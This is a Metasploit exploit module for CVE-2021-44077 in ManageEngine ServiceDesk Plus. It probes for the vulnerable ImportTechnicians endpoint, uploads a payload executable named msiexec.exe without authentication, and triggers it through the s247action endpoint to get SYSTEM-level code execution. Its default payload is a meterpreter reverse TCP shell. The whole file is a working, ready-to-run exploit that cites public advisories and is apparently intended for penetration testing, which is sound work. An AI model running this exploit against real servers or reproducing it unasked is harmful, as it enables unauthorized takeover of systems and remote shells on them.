# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(
update_info(
info,
'Name' => 'ManageEngine ServiceDesk Plus CVE-2021-44077',
'Description' => %q{
This module exploits CVE-2021-44077, an unauthenticated remote
code
execution vulnerability in ManageEngine ServiceDesk Plus, to upload
an
EXE (msiexec.exe) and execute it as the SYSTEM account.
Note that build 11305 is vulnerable to the authentication bypass
but
not the file upload. The module will check for an exploitable
build.
},
'Author' => [
# Discovered by unknown threat actors
'wvu', # Analysis and exploit
'Y4er' # Additional confirmation
],
'References' => [
['CVE', '2021-44077'],
['URL',
'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above'],
['URL',
'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021'],
['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa21-336a'],
['URL',
'https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/'],
['URL',
'https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis'],
['URL', 'https://xz.aliyun.com/t/10631'] # Y4er's writeup
],
'DisclosureDate' => '2021-09-16',
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Privileged' => true,
'Targets' => [
['Windows Dropper', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 8080,
'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,
'/RestAPI/ImportTechnicians')
)
unless res
return CheckCode::Unknown('Target failed to respond to check.')
end
# NOTE: /RestAPI/ImportTechnicians was removed after build
11303
unless res.code == 200 &&
res.get_html_document.at('//form[@name="ImportTechnicians"]')
return CheckCode::Safe('/RestAPI/ImportTechnicians is not
present.')
end
CheckCode::Appears('/RestAPI/ImportTechnicians is present.')
end
def exploit
upload_msiexec
execute_msiexec
end
def upload_msiexec
print_status('Uploading msiexec.exe')
form = Rex::MIME::Message.new
form.add_part(Faker::Hacker.verb, nil, nil, 'form-data;
name="step"')
form.add_part(generate_payload_exe, 'application/octet-stream',
'binary',
'form-data; name="theFile"; filename="msiexec.exe"')
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,
'/RestAPI/ImportTechnicians'),
'ctype' => "multipart/form-data; boundary=#{form.bound}",
'data' => form.to_s
)
unless res&.code == 401 &&
res.body.include?('sdp.vulnerability.exceptionerror.title')
fail_with(Failure::NotVulnerable, 'Failed to upload
msiexec.exe')
end
print_good('Successfully uploaded msiexec.exe')
end
def execute_msiexec
print_status('Executing msiexec.exe')
# This endpoint "won't" return
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,
'/RestAPI/s247action'),
'vars_post' => {
'execute' => 's247AgentInstallationProcess'
}
}, 0)
end
# XXX: FileDropper dies a miserable death if the file is in
use
def on_new_session(_session)
super
# Working directory is C:\Program
Files\ManageEngine\ServiceDesk\site24x7
print_warning("Yo, don't forget to clean up
..\\bin\\msiexec.exe")
end
end
